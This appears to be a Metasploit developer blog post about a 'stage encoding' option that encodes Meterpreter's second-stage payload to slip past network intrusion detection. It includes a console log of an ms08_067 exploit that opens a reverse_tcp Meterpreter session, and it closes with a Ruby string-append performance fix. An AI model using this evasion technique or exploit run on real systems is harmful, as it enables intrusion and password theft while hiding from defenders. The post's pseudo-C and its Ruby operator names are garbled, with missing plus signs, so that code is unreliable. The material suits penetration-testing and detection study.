Last updated at Tue, 25 Apr 2023 22:47:39 GMT

As I mentioned in my post about compiling on the fly, encoders' primary purpose in life is to avoid bad characters in a payload. To recap, the main reason a character is considered "bad" is that some aspect of the exploit makes use of that character impossible.  One reason this might be the case is when a character gets stripped out or mangled along its journey through protocol decoding. For example, in the telnet protocol, \xff is the IAC or Interpret As Command byte. It is treated specially and cannot be used in a payload delivered via that protocol.

However, encoders have a secondary purpose as well: entropy. Encoders are essentially ineffective against Anti-Virus in most cases because of the nature of executable payloads, but can be much more useful against network-based intrusion detection. By making traffic as random as possible, we make it much more difficult for pattern matching on packets to notice anything nefarious.

One place this has been missing is in the second stage payloads. With a staged payload, the first stage connects back to Metasploit who hands it back a larger, more featureful payload. In the case of Meterpreter, the second stage payload is actually a DLL using Stephen Fewer's reflective loading technique to be able to treat the whole file as shellcode.  What this means from a network defense perspective, is seeing an MZ header come across the wire. That's bad news for the poor pentester who's just trying to make ends meet by owning corporate networks and stealing passwords.

Enter stage encoding. Encoding the second stage works just like encoding the stager but the purpose is different. Since the exploit has already done all the hard work of achieving code execution, and the first stage has prepared a nice chunk of memory for us to run in, the second stage doesn't have to worry about pesky things like character restrictions.

Here it is in action:

01:49:54 0 0 exploit(ms08_067_netapi) > show advanced      [ ... snip ... ] Payload advanced options (windows/meterpreter/reverse_tcp):      [ ... snip ... ]    Name           : EnableStageEncoding    Current Setting: false    Description    : Encode the second stage payload      [ ... snip ... ]    Name           : StageEncoder    Current Setting:    Description    : Encoder to use if EnableStageEncoding is set      [ ... snip ... ] 01:49:55 0 0 exploit(ms08_067_netapi) > set EnableStageEncoding true EnableStageEncoding => true 01:49:55 0 0 exploit(ms08_067_netapi) > exploit -z [*] Started reverse handler on [*] Automatically detecting the target... [*] Fingerprint: Windows 2003 - Service Pack 1 - lang:Unknown [*] We could not detect the language pack, defaulting to English [*] Selected Target: Windows 2003 SP1 English (NX) [*] Attempting to trigger the vulnerability... [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (752158 bytes) to [*] Meterpreter session 8 opened ( -> at 2013-01-29 01:50:18 -0600 [*] Session 8 created in the background. 01:50:18 1 0 exploit(ms08_067_netapi) > 

The output here is only subtly different from before. Stage encoding adds a new line ("[*] Encoded stage with x86/shikata_ga_nai") telling us it has done its job. But the network is a different story. Here's what it looks like without stage encoding:

And here it is with stage encoding enabled:

Like encoding of the stager (or the single stage in the case of a standalone payload), we start with the highest ranked encoder module and fall through to lower-ranked modules if that doesn't work. Since there are no bad characters to avoid, the system will always pick the highest ranked encoder. Encoders are ranked by randomness, so you'll get a pretty good pile of entropy from the default for your platform (for x86, this is shikata_ga_nai). If you don't like that, you can set a particular one in the StageEncoder advanced option.

The idea for stage encoding has been around for a long time -- the first commit to introduce it was back in 2007 -- but it's been disabled for almost as long. Back in October, open source contributor Agix brought it back to the world's attention with a pull request that uncommented the encoding.  Unfortunately, it still had the problems that skape had encountered in 2007, namely that it just took far too long to encode the larger buffer of the second stage. After debating with several folks on what to do with this problem, I decided to just dig into it and find out why it was so slow and whether there was anything we could do about it.

Two major performance enhancements came out of that digging. The first was taking advantage of the fact that there can be no bad xor keys if there are no bad characters to avoid. Short-circuiting a loop over the entire buffer saved a bit. The second was much more substantial and has to do with a quirk of Ruby string manipulation, which I mentioned before, in 2009.

String#<< is the append operator. It takes the argument and stuffs it onto the end of your string, changing it in place.  String# on the other hand, returns a new String containing both. There is some amount of overhead in creating a new object compared to just changing an existing one, but that's only part of the issue here. The difference from a performance perspective is best illustrated with some pseudo-C:

// String#<< self = realloc(self, strlen(self) strlen(other) 1); memcpy(self strlen(self), other, strlen(other)); return self; 
// String# a = malloc(strlen(self) strlen(b) 1); memcpy(a, self, strlen(self)); memcpy(a strlen(b), self, strlen(self)); return a; 

Notice that appending requires copying only the argument while creating a new string requires copying both, in addition to that small amount of overhead for creating a new string object. Notice also that if you put this in a loop, that small amount of overhead gets multiplied by the length of the loop and you take another hit the next time the garbage collector runs.

Changing one line in the encoding system to use << instead of = improved the performance of encoding large buffers by two orders of magnitude. The result is usable encoding on ~1MB of shellcode and no more MZ headers on the wire.